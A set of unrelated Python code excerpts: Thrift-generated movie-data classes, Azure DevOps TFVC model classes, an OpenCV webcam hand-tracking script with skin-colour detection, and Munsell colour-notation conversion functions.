if self.timestamp is not None:
oprot.writeFieldBegin('timestamp', TType.I64, 7)
oprot.writeI64(self.timestamp)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CastInfo(object):
"""
Attributes:
- cast_info_id
- name
- gender
- intro
"""
def __init__(self, cast_info_id=None, name=None, gender=None, intro=None,):
self.cast_info_id = cast_info_id
self.name = name
self.gender = gender
self.intro = intro
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.cast_info_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.name = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.BOOL:
self.gender = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.intro = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('CastInfo')
if self.cast_info_id is not None:
oprot.writeFieldBegin('cast_info_id', TType.I64, 1)
oprot.writeI64(self.cast_info_id)
oprot.writeFieldEnd()
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 2)
oprot.writeString(self.name.encode('utf-8') if sys.version_info[0] == 2 else self.name)
oprot.writeFieldEnd()
if self.gender is not None:
oprot.writeFieldBegin('gender', TType.BOOL, 3)
oprot.writeBool(self.gender)
oprot.writeFieldEnd()
if self.intro is not None:
oprot.writeFieldBegin('intro', TType.STRING, 4)
oprot.writeString(self.intro.encode('utf-8') if sys.version_info[0] == 2 else self.intro)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Cast(object):
"""
Attributes:
- cast_id
- character
- cast_info_id
"""
def __init__(self, cast_id=None, character=None, cast_info_id=None,):
self.cast_id = cast_id
self.character = character
self.cast_info_id = cast_info_id
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.cast_id = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.character = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.cast_info_id = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('Cast')
if self.cast_id is not None:
oprot.writeFieldBegin('cast_id', TType.I32, 1)
oprot.writeI32(self.cast_id)
oprot.writeFieldEnd()
if self.character is not None:
oprot.writeFieldBegin('character', TType.STRING, 2)
oprot.writeString(self.character.encode('utf-8') if sys.version_info[0] == 2 else self.character)
oprot.writeFieldEnd()
if self.cast_info_id is not None:
oprot.writeFieldBegin('cast_info_id', TType.I64, 3)
oprot.writeI64(self.cast_info_id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class MovieInfo(object):
"""
Attributes:
- movie_id
- title
- casts
- plot_id
- thumbnail_ids
- photo_ids
- video_ids
- avg_rating
- num_rating
"""
def __init__(self, movie_id=None, title=None, casts=None, plot_id=None, thumbnail_ids=None, photo_ids=None, video_ids=None, avg_rating=None, num_rating=None,):
self.movie_id = movie_id
self.title = title
self.casts = casts
self.plot_id = plot_id
self.thumbnail_ids = thumbnail_ids
self.photo_ids = photo_ids
self.video_ids = video_ids
self.avg_rating = avg_rating
self.num_rating = num_rating
def read(self, iprot):
if | |
'version_type': {'key': 'versionType', 'type': 'object'}
}
def __init__(self, path=None, recursion_level=None, version=None, version_option=None, version_type=None):
super(TfvcItemDescriptor, self).__init__()
self.path = path
self.recursion_level = recursion_level
self.version = version
self.version_option = version_option
self.version_type = version_type
class TfvcItemRequestData(Model):
"""TfvcItemRequestData.
:param include_content_metadata: If true, include metadata about the file type
:type include_content_metadata: bool
:param include_links: Whether to include the _links field on the shallow references
:type include_links: bool
:param item_descriptors:
:type item_descriptors: list of :class:`TfvcItemDescriptor <azure.devops.v5_0.tfvc.models.TfvcItemDescriptor>`
"""
_attribute_map = {
'include_content_metadata': {'key': 'includeContentMetadata', 'type': 'bool'},
'include_links': {'key': 'includeLinks', 'type': 'bool'},
'item_descriptors': {'key': 'itemDescriptors', 'type': '[TfvcItemDescriptor]'}
}
def __init__(self, include_content_metadata=None, include_links=None, item_descriptors=None):
super(TfvcItemRequestData, self).__init__()
self.include_content_metadata = include_content_metadata
self.include_links = include_links
self.item_descriptors = item_descriptors
class TfvcLabelRef(Model):
"""TfvcLabelRef.
:param _links: Collection of reference links.
:type _links: :class:`ReferenceLinks <azure.devops.v5_0.tfvc.models.ReferenceLinks>`
:param description: Label description.
:type description: str
:param id: Label Id.
:type id: int
:param label_scope: Label scope.
:type label_scope: str
:param modified_date: Last modified datetime for the label.
:type modified_date: datetime
:param name: Label name.
:type name: str
:param owner: Label owner.
:type owner: :class:`IdentityRef <azure.devops.v5_0.tfvc.models.IdentityRef>`
:param url: Label Url.
:type url: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'description': {'key': 'description', 'type': 'str'},
'id': {'key': 'id', 'type': 'int'},
'label_scope': {'key': 'labelScope', 'type': 'str'},
'modified_date': {'key': 'modifiedDate', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'owner': {'key': 'owner', 'type': 'IdentityRef'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, _links=None, description=None, id=None, label_scope=None, modified_date=None, name=None, owner=None, url=None):
super(TfvcLabelRef, self).__init__()
self._links = _links
self.description = description
self.id = id
self.label_scope = label_scope
self.modified_date = modified_date
self.name = name
self.owner = owner
self.url = url
class TfvcLabelRequestData(Model):
"""TfvcLabelRequestData.
:param include_links: Whether to include the _links field on the shallow references
:type include_links: bool
:param item_label_filter:
:type item_label_filter: str
:param label_scope:
:type label_scope: str
:param max_item_count:
:type max_item_count: int
:param name:
:type name: str
:param owner:
:type owner: str
"""
_attribute_map = {
'include_links': {'key': 'includeLinks', 'type': 'bool'},
'item_label_filter': {'key': 'itemLabelFilter', 'type': 'str'},
'label_scope': {'key': 'labelScope', 'type': 'str'},
'max_item_count': {'key': 'maxItemCount', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'owner': {'key': 'owner', 'type': 'str'}
}
def __init__(self, include_links=None, item_label_filter=None, label_scope=None, max_item_count=None, name=None, owner=None):
super(TfvcLabelRequestData, self).__init__()
self.include_links = include_links
self.item_label_filter = item_label_filter
self.label_scope = label_scope
self.max_item_count = max_item_count
self.name = name
self.owner = owner
class TfvcMappingFilter(Model):
"""TfvcMappingFilter.
:param exclude: True if ServerPath should be excluded.
:type exclude: bool
:param server_path: Path to be included or excluded.
:type server_path: str
"""
_attribute_map = {
'exclude': {'key': 'exclude', 'type': 'bool'},
'server_path': {'key': 'serverPath', 'type': 'str'}
}
def __init__(self, exclude=None, server_path=None):
super(TfvcMappingFilter, self).__init__()
self.exclude = exclude
self.server_path = server_path
class TfvcMergeSource(Model):
"""TfvcMergeSource.
:param is_rename: Indicates if this a rename source. If false, it is a merge source.
:type is_rename: bool
:param server_item: The server item of the merge source.
:type server_item: str
:param version_from: Start of the version range.
:type version_from: int
:param version_to: End of the version range.
:type version_to: int
"""
_attribute_map = {
'is_rename': {'key': 'isRename', 'type': 'bool'},
'server_item': {'key': 'serverItem', 'type': 'str'},
'version_from': {'key': 'versionFrom', 'type': 'int'},
'version_to': {'key': 'versionTo', 'type': 'int'}
}
def __init__(self, is_rename=None, server_item=None, version_from=None, version_to=None):
super(TfvcMergeSource, self).__init__()
self.is_rename = is_rename
self.server_item = server_item
self.version_from = version_from
self.version_to = version_to
class TfvcPolicyFailureInfo(Model):
"""TfvcPolicyFailureInfo.
:param message: Policy failure message.
:type message: str
:param policy_name: Name of the policy that failed.
:type policy_name: str
"""
_attribute_map = {
'message': {'key': 'message', 'type': 'str'},
'policy_name': {'key': 'policyName', 'type': 'str'}
}
def __init__(self, message=None, policy_name=None):
super(TfvcPolicyFailureInfo, self).__init__()
self.message = message
self.policy_name = policy_name
class TfvcPolicyOverrideInfo(Model):
"""TfvcPolicyOverrideInfo.
:param comment: Overidden policy comment.
:type comment: str
:param policy_failures: Information on the failed policy that was overridden.
:type policy_failures: list of :class:`TfvcPolicyFailureInfo <azure.devops.v5_0.tfvc.models.TfvcPolicyFailureInfo>`
"""
_attribute_map = {
'comment': {'key': 'comment', 'type': 'str'},
'policy_failures': {'key': 'policyFailures', 'type': '[TfvcPolicyFailureInfo]'}
}
def __init__(self, comment=None, policy_failures=None):
super(TfvcPolicyOverrideInfo, self).__init__()
self.comment = comment
self.policy_failures = policy_failures
class TfvcShallowBranchRef(Model):
"""TfvcShallowBranchRef.
:param path: Path for the branch.
:type path: str
"""
_attribute_map = {
'path': {'key': 'path', 'type': 'str'}
}
def __init__(self, path=None):
super(TfvcShallowBranchRef, self).__init__()
self.path = path
class TfvcShelvesetRef(Model):
"""TfvcShelvesetRef.
:param _links: List of reference links for the shelveset.
:type _links: :class:`ReferenceLinks <azure.devops.v5_0.tfvc.models.ReferenceLinks>`
:param comment: Shelveset comment.
:type comment: str
:param comment_truncated: Shelveset comment truncated as applicable.
:type comment_truncated: bool
:param created_date: Shelveset create date.
:type created_date: datetime
:param id: Shelveset Id.
:type id: str
:param name: Shelveset name.
:type name: str
:param owner: Shelveset Owner.
:type owner: :class:`IdentityRef <azure.devops.v5_0.tfvc.models.IdentityRef>`
:param url: Shelveset Url.
:type url: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'comment': {'key': 'comment', 'type': 'str'},
'comment_truncated': {'key': 'commentTruncated', 'type': 'bool'},
'created_date': {'key': 'createdDate', 'type': 'iso-8601'},
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'owner': {'key': 'owner', 'type': 'IdentityRef'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, _links=None, comment=None, comment_truncated=None, created_date=None, id=None, name=None, owner=None, url=None):
super(TfvcShelvesetRef, self).__init__()
self._links = _links
self.comment = comment
self.comment_truncated = comment_truncated
self.created_date = created_date
self.id = id
self.name = name
self.owner = owner
self.url = url
class TfvcShelvesetRequestData(Model):
"""TfvcShelvesetRequestData.
:param include_details: Whether to include policyOverride and notes Only applies when requesting a single deep shelveset
:type include_details: bool
:param include_links: Whether to include the _links field on the shallow references. Does not apply when requesting a single deep shelveset object. Links will always be included in the deep shelveset.
:type include_links: bool
:param include_work_items: Whether to include workItems
:type include_work_items: bool
:param max_change_count: Max number of changes to include
:type max_change_count: int
:param max_comment_length: Max length of comment
:type max_comment_length: int
:param name: Shelveset name
:type name: str
:param owner: Owner's ID. Could be a name or a guid.
:type owner: str
"""
_attribute_map = {
'include_details': {'key': 'includeDetails', 'type': 'bool'},
'include_links': {'key': 'includeLinks', 'type': 'bool'},
'include_work_items': {'key': 'includeWorkItems', 'type': 'bool'},
'max_change_count': {'key': 'maxChangeCount', 'type': 'int'},
'max_comment_length': {'key': 'maxCommentLength', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'owner': {'key': 'owner', 'type': 'str'}
}
def __init__(self, include_details=None, include_links=None, include_work_items=None, max_change_count=None, max_comment_length=None, name=None, owner=None):
super(TfvcShelvesetRequestData, self).__init__()
self.include_details = include_details
self.include_links = include_links
self.include_work_items = include_work_items
self.max_change_count = max_change_count
self.max_comment_length = max_comment_length
self.name = name
self.owner = owner
class TfvcStatistics(Model):
"""TfvcStatistics.
:param changeset_id: Id of the last changeset the stats are based on.
:type changeset_id: int
:param file_count_total: Count of files at the requested scope.
:type file_count_total: long
"""
_attribute_map = {
'changeset_id': {'key': 'changesetId', 'type': 'int'},
'file_count_total': {'key': 'fileCountTotal', 'type': 'long'}
}
def __init__(self, changeset_id=None, file_count_total=None):
super(TfvcStatistics, self).__init__()
self.changeset_id = changeset_id
self.file_count_total = file_count_total
class TfvcVersionDescriptor(Model):
"""TfvcVersionDescriptor.
:param version: Version object.
:type version: str
:param version_option:
:type version_option: object
:param version_type:
:type version_type: object
"""
_attribute_map = {
'version': {'key': 'version', 'type': 'str'},
'version_option': {'key': 'versionOption', 'type': 'object'},
'version_type': {'key': 'versionType', 'type': 'object'}
}
def __init__(self, version=None, version_option=None, version_type=None):
super(TfvcVersionDescriptor, self).__init__()
self.version = version
self.version_option = version_option
self.version_type = version_type
class VersionControlProjectInfo(Model):
"""VersionControlProjectInfo.
:param default_source_control_type:
:type default_source_control_type: object
:param project:
:type project: :class:`TeamProjectReference <azure.devops.v5_0.tfvc.models.TeamProjectReference>`
:param supports_git:
:type supports_git: bool
:param supports_tFVC:
:type supports_tFVC: bool
"""
_attribute_map = {
'default_source_control_type': {'key': 'defaultSourceControlType', 'type': 'object'},
'project': {'key': 'project', 'type': 'TeamProjectReference'},
'supports_git': {'key': 'supportsGit', 'type': 'bool'},
'supports_tFVC': {'key': 'supportsTFVC', 'type': 'bool'}
}
def __init__(self, default_source_control_type=None, project=None, supports_git=None, supports_tFVC=None):
super(VersionControlProjectInfo, self).__init__()
self.default_source_control_type = default_source_control_type
self.project = project
self.supports_git = supports_git
self.supports_tFVC = supports_tFVC
class VstsInfo(Model):
"""VstsInfo.
:param collection:
:type collection: :class:`TeamProjectCollectionReference <azure.devops.v5_0.tfvc.models.TeamProjectCollectionReference>`
:param repository:
:type repository: :class:`GitRepository <azure.devops.v5_0.tfvc.models.GitRepository>`
:param server_url:
:type server_url: str
"""
_attribute_map = {
'collection': {'key': 'collection', 'type': 'TeamProjectCollectionReference'},
'repository': {'key': 'repository', 'type': 'GitRepository'},
'server_url': {'key': 'serverUrl', 'type': 'str'}
}
def __init__(self, collection=None, repository=None, server_url=None):
super(VstsInfo, self).__init__()
self.collection = collection
self.repository = repository
self.server_url = server_url
class TfvcBranchRef(TfvcShallowBranchRef):
"""TfvcBranchRef.
:param path: Path for the branch.
:type path: str
:param _links: A collection of REST reference links.
:type _links: :class:`ReferenceLinks <azure.devops.v5_0.tfvc.models.ReferenceLinks>`
:param created_date: Creation date of the branch.
:type created_date: datetime
:param description: Branch description.
:type description: str
:param is_deleted: Is the branch deleted?
:type is_deleted: bool
:param owner: Alias or display name of user
:type owner: :class:`IdentityRef <azure.devops.v5_0.tfvc.models.IdentityRef>`
:param url: URL to retrieve the item.
:type url: str
"""
_attribute_map = {
'path': {'key': 'path', 'type': 'str'},
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
| |
import cv2
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime
from mpl_toolkits.mplot3d import Axes3D
#import time
# Initialize webcam input
cap = cv2.VideoCapture(0)
# Initialize video input
#cap = cv2.VideoCapture("C:/Users/liangx/Documents/Dunhill Project Data/Single Sign/Stomach/FARM.mp4")
#cap = cv2.VideoCapture("C:/Users/liangx/Documents/Dunhill Project Data/Single Sign/Below Waist/LAP.mp4")
#cap = cv2.VideoCapture("C:/Users/liangx/Documents/Dunhill Project Data/Restricted/L2n.mov")
#cap = cv2.VideoCapture("C:/Users/liangx/Documents/Dunhill Project Data/Single Sign/Pronated Wrist/WATCH2.mp4")
# Set different colour converstion models {1 : HSV,2 : YCrCb,3 : LAB, 4 : XYZ,}
COLOUR_MODEL = 1;
# Set Tracking Delay (i.e. delay in number of frames) to wait for KNN background subtraction work (Camera: 30; Video: 5)
DELAY= 10
# Set countour radius to denoise, only contours bigger enough are tracked (Camera: 45-55 ajust the value depending on distance between tracking object and camera; Video: 35)
RADIUS = 40
# Set frame count number for tracking trails reset (when there is no hands being detected)
FRAME = 100
# Initialize frame_acount
frame_count = 0
# Get video/camera input details
"""
lengthVideo = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
widthVideo = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
heightVideo = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
# fps for video input with a stream header (need nb_frames field)
fpsVideo = int(cap.get(cv2.CAP_PROP_FPS))
# fps for camera input without a stream header
# Number of frames to capture
num_frames = 120;
print ("Capturing {0} frames".format(num_frames))
# Start time
start = time.time()
# Grab a few frames
for i in range(0, num_frames):
ret, frame = cap.read()
# End time
end = time.time()
# Time elapsed
seconds = end - start
print ("Time taken : {0} seconds".format(seconds))
# Calculate frames per second
fpsCamera = int(num_frames / seconds)
print ("Estimated frames per second : {0}".format(fpsCamera))
"""
# Create empty points array for hand trajectories tracking
points_left = []
points_right = []
# Initlaize K-Nearest Neighbors (KNN) background subtractor
#kernel_bgsub = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3,3))
#fgbg = cv2.createBackgroundSubtractorKNN()
# returns the elapsed milliseconds since the start of the program
def milliseconds():
dt = datetime.now() - start_time
ms = (dt.days * 24 * 60 * 60 + dt.seconds) * 1000 + dt.microseconds / 1000.0
return ms
# Sorting contour by area
def get_contour_areas(contours):
# returns the areas of all contours as list
all_areas = []
for cnt in contours:
area = cv2.contourArea(cnt)
all_areas.append(area)
return all_areas
# Sorting contour by position
def x_cord_contour(contours):
#Returns the X cordinate for the contour centroid
M = cv2.moments(contours)
return (int(M['m10']/M['m00']))
#Plot trajectories X-Y
def plot_trajectories(center,str, clr):
xs = [x[0] for x in center]
ys = [x[1] for x in center]
plt.plot(xs, ys, color= clr)
plt.xlabel('X')
plt.ylabel('Y')
plt.title(str + ' hand trajectories')
plt.gca().invert_yaxis() #Reverse Y-Axis in PyPlot (opencv choose the coordinate system of points/images from Top-Left corner)
#plt.gca().invert_xaxis() #Reverse X-Axis in PyPlot (Make trajectories like a Mirror View)
plt.show()
return None
#Plot trajectories with time
def plot_trajectories_vstime(center,str):
xs = [x[0] for x in center]
ys = [x[1] for x in center]
ts = [x[2] for x in center]
plt.plot(ts, xs, color='b', marker ='o',label='$X-Trajectory$')
plt.plot(ts, ys, color='y', marker ='^',label='$Y-Trajectory$')
plt.xlabel('Time')
plt.ylabel('X-Y')
plt.title(str + ' hand trajectories')
plt.gca().invert_yaxis() #Reverse Y-Axis in PyPlot (y reverted for:opencv choose the coordinate system of points/images from Top-Left corner; x reverted for: mirror effect)
#plt.gca().invert_xaxis() #Reverse X-Axis in PyPlot (Make trajectories like a Mirror View)
plt.legend(loc='upper right')
plt.show()
return None
#Plot 3D trjectories with Timeline on marker
"""
def plot_trajectories_3d(center, str, clr):
xs = [x[0] for x in center]
ys = [x[1] for x in center]
ts = [x[2] for x in center]
fig = plt.figure()
ax = plt.axes(projection='3d')
#ax.plot3D(xs, ys, dates.date2num(ts), 'gray')
ax.plot3D(xs, np.arange(0, len(xs)), ys, color= clr, marker ='o')
ax.set_xlabel('X')
ax.set_ylabel('Time (H:M:S)')
ax.set_zlabel('Y')
ax.set_title(str + '-Trajectory')
plt.gca().invert_zaxis() #Reverse Z-Axis in PyPlot (to revert y)
#plt.gca().invert_xaxis() #Reverse X-Axis in PyPlot (Make trajectories like a Mirror View)
# place text annotations for timestamp on a 3D plot ([ts] in hour:min:sec formate)
for x, y, z, label in zip(xs, np.arange(0, len(xs)), ys, ts):
ax.text(x, y, z, label)
plt.show()
return None
"""
#Plot 3D trjectories with Timeline in Y
def plot_trajectories_3d(center, str, clr):
xs = [x[0] for x in center]
ys = [x[1] for x in center]
ts = [x[2] for x in center]
fig = plt.figure()
ax = plt.axes(projection='3d')
ax.plot3D(xs, ts, ys, color= clr, marker ='o')
#ax.set_yticks =(0, -1, 100)
ax.set_xlabel('X')
ax.set_ylabel('Time (ms)')
ax.set_zlabel('Y')
ax.set_title(str + '-Trajectory')
plt.gca().invert_zaxis() #Reverse Z-Axis in PyPlot (to revert y)
#plt.gca().invert_xaxis() #Reverse X-Axis in PyPlot (Make trajectories like a Mirror View)
plt.show()
return None
# define the different colour convertion function blocks: from RBG/BGR to HSV/YCrCb/LAB/XYZ
def HSV():
con_img = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
cv2.imshow('HSV Colour Model Image:', con_img)
return con_img
# map the inputs to the different colour convertion function blocks
options = {1 : HSV,
}
# define the different colour convertion threshold
def HSV_thre():
# Selected Value sets
low_thresh = np.array([0, 48, 80], dtype = "uint8")
up_thresh = np.array([20, 255, 255], dtype = "uint8")
#low_thresh = np.array([0, 10, 60], dtype = "uint8")
#up_thresh = np.array([20, 150, 255], dtype = "uint8")
#DeepGaze Threshold (too much yellow)
#low_thresh = np.array([0, 58, 50], dtype = "uint8")
#up_thresh = np.array([30, 250, 255], dtype = "uint8")
return low_thresh, up_thresh
# map the inputs to different colour convertion threshold
options_thre = {1 : HSV_thre,
}
#Set lower_thresh, upper_thresh for different colour convertion models
lower_thresh, upper_thresh = options_thre[COLOUR_MODEL]()
# Get current date & time
DATE= datetime.now().strftime('%Y:%m:%d')
start_time = datetime.now()
# Loop video capture until break statement is exectured
while cap.isOpened():
# Read webcam/video image
ret, frame = cap.read()
# when there is a video input
if ret == True:
# Get default camera/video window size
Height, Width = frame.shape[:2]
#Different colour convertion function blocks is invoked:
converted_img = options[COLOUR_MODEL]()
# Face Detection Using HAAR CASCADE
hc_face = cv2.CascadeClassifier("C:/Users/liangx/source/repos/Skin Detection/haarcascade_frontalface_alt/haarcascade_frontalface_alt.xml")
faces = hc_face.detectMultiScale(converted_img)
for (x,y,w,h) in faces:
# If we do not draw a box on face, then use the code below
#cv2.rectangle(converted_img, (x,y), (x+w,y+h), 255, thickness=2)
# If we draw a box on face to avoid face skin detection, then use the code below
cv2.rectangle(converted_img, (x,y-30), (x+w+10, y+h+50), (255,255,255), -1)
crop_img = frame[y+2:y+w, x+2:x+h]
cv2.imshow('Face Detection', crop_img)
# Use inRange to capture only the values between lower & upper_thresh for skin detection
mask = cv2.inRange(converted_img, lower_thresh, upper_thresh)
# Adding morphology effects to denoise
kernel_morphology =np.ones((5, 5), np.uint8)
mask = cv2.erode(mask, kernel_morphology, iterations=1)
#mask=cv2.morphologyEx(mask,cv2.MORPH_OPEN, kernel_morphology)
mask=cv2.morphologyEx(mask,cv2.MORPH_CLOSE,kernel_morphology)
mask = cv2.dilate(mask, kernel_morphology, iterations=1)
cv2.imshow('Skin colour + Morpho Mask', mask)
# Perform Bitwise AND on mask and original frame
# rest1 is the results after applying morphology effects + skin filtering
rest1 = cv2.bitwise_and(frame, frame, mask= mask)
# Apply KKN background subtraction to refine skin filtering result, i.e. to further remove static skin coulor related background (face will be fading out, if it does not move)
#fgmask = fgbg.apply(rest1)
#fgmask = cv2.morphologyEx(fgmask, cv2.MORPH_OPEN, kernel_bgsub)
#cv2.imshow('Background subtraction + Skin colour + Morpho Mask',fgmask)
# Perform Bitwise AND on fgmask and rest1 frame
# rest2 is results after applying background subtraction + morphology effects + skin filtering
#rest2 = cv2.bitwise_and(rest1, rest1, mask= fgmask)
# Find contours on fgmask
# cv2.RETR_EXTERNAL finds external contours only; cv2.CHAIN_APPROX_SIMPLE only provides start and end points of bounding contours, thus resulting in much more efficent storage of contour information.
#_, contours, _ = cv2.findContours(fgmask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
# Find contours on mask
# cv2.RETR_EXTERNAL finds external contours only; cv2.CHAIN_APPROX_SIMPLE only provides start and end points of bounding contours, thus resulting in much more efficent storage of contour information.
_, contours, _ = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
print ("Number of contours1 found = ", len(contours))
#print(type(contours)) #The variable 'contours' are stored as a numpy array of (x,y) points that form the contour
# Draw all Contours found
#cv2.drawContours(rest2, contours, -1, (0,255,0), 3)
#cv2.imshow('All Contours filtered by skin color and background subtraction', rest2)
#cv2.imshow('Original', frame)
# When both hands are detected
if len(contours) >=2:
# Get the largest two contours and its center (i.e. two hands)
sorted_contours = sorted(contours, key=cv2.contourArea, reverse=True)[:2]
# Sort by reverse=True, using our x_cord_contour function (i.e. hands tracking from left to right)
contours_left_to_right = sorted(sorted_contours, key = x_cord_contour, reverse = True)
# Iterate over two contours and draw one at a time
for (i,c) in enumerate(contours_left_to_right):
# Draw Convex Hull Contour | |
0.5, nan, nan])
"""
specification = as_float_array(specification)
if is_grey_munsell_colour(specification):
return specification * np.array([np.nan, 1, np.nan, np.nan])
else:
hue, value, chroma, code = specification
if hue == 0:
# 0YR is equivalent to 10R.
hue, code = 10, (code + 1) % 10
if chroma == 0:
return tstack([np.nan, value, np.nan, np.nan])
else:
return tstack([hue, value, chroma, code])
def munsell_colour_to_munsell_specification(munsell_colour: str) -> NDArray:
"""
Retrieve a normalised *Munsell* *Colorlab* specification from given
*Munsell* colour.
Parameters
----------
munsell_colour
*Munsell* colour.
Returns
-------
:class:`numpy.ndarray`
Normalised *Munsell* *Colorlab* specification.
Examples
--------
>>> munsell_colour_to_munsell_specification('N5.2')
array([ nan, 5.2, nan, nan])
>>> munsell_colour_to_munsell_specification('0YR 2.0/4.0')
array([ 10., 2., 4., 7.])
"""
return normalise_munsell_specification(
parse_munsell_colour(munsell_colour)
)
def munsell_specification_to_munsell_colour(
specification: ArrayLike,
hue_decimals: Integer = 1,
value_decimals: Integer = 1,
chroma_decimals: Integer = 1,
) -> str:
"""
Convert from *Munsell* *Colorlab* specification to given *Munsell* colour.
Parameters
----------
specification
*Munsell* *Colorlab* specification.
hue_decimals
Hue formatting decimals.
value_decimals
Value formatting decimals.
chroma_decimals
Chroma formatting decimals.
Returns
-------
:class:`str`
*Munsell* colour.
Examples
--------
>>> munsell_specification_to_munsell_colour(
... np.array([np.nan, 5.2, np.nan, np.nan]))
'N5.2'
>>> munsell_specification_to_munsell_colour(
... np.array([10, 2.0, 4.0, 7]))
'10.0R 2.0/4.0'
"""
hue, value, chroma, code = tsplit(
normalise_munsell_specification(specification)
)
if is_grey_munsell_colour(specification):
return MUNSELL_GRAY_EXTENDED_FORMAT.format(value, value_decimals)
else:
hue = round(hue, hue_decimals)
attest(
0 <= hue <= 10,
f'"{specification!r}" specification hue must be normalised to '
f"domain [0, 10]!",
)
value = round(value, value_decimals)
attest(
0 <= value <= 10,
f'"{specification!r}" specification value must be normalised to '
f"domain [0, 10]!",
)
chroma = round(chroma, chroma_decimals)
attest(
2 <= chroma <= 50,
f'"{specification!r}" specification chroma must be normalised to '
f"domain [2, 50]!",
)
code_values = MUNSELL_HUE_LETTER_CODES.values()
code = round(code, 1)
attest(
code in code_values,
f'"{specification!r}" specification code must one of '
f'"{code_values}"!',
)
if value == 0:
return MUNSELL_GRAY_EXTENDED_FORMAT.format(value, value_decimals)
else:
hue_letter = MUNSELL_HUE_LETTER_CODES.first_key_from_value(code)
return MUNSELL_COLOUR_EXTENDED_FORMAT.format(
hue,
hue_decimals,
hue_letter,
value,
value_decimals,
chroma,
chroma_decimals,
)
def xyY_from_renotation(specification: ArrayLike) -> NDArray:
"""
Return given existing *Munsell* *Colorlab* specification *CIE xyY*
colourspace vector from *Munsell Renotation System* data.
Parameters
----------
specification
*Munsell* *Colorlab* specification.
Returns
-------
:class:`numpy.ndarray`
*CIE xyY* colourspace vector.
Raises
------
ValueError
If the given specification doesn't exist in *Munsell Renotation System*
data.
Examples
--------
>>> xyY_from_renotation(np.array([2.5, 0.2, 2.0, 4])) # doctest: +ELLIPSIS
array([ 0.71..., 1.41..., 0.23...])
"""
specification = normalise_munsell_specification(specification)
try:
index = np.where(
(_munsell_specifications() == specification).all(axis=-1)
)
return MUNSELL_COLOURS_ALL[int(index[0])][1]
except Exception:
raise ValueError(
f'"{specification}" specification does not exists in '
'"Munsell Renotation System" data!'
)
def is_specification_in_renotation(specification: ArrayLike) -> Boolean:
"""
Return whether given *Munsell* *Colorlab* specification is in
*Munsell Renotation System* data.
Parameters
----------
specification
*Munsell* *Colorlab* specification.
Returns
-------
:class:`bool`
Whether specification is in *Munsell Renotation System* data.
Examples
--------
>>> is_specification_in_renotation(np.array([2.5, 0.2, 2.0, 4]))
True
>>> is_specification_in_renotation(np.array([64, 0.2, 2.0, 4]))
False
"""
try:
xyY_from_renotation(specification)
return True
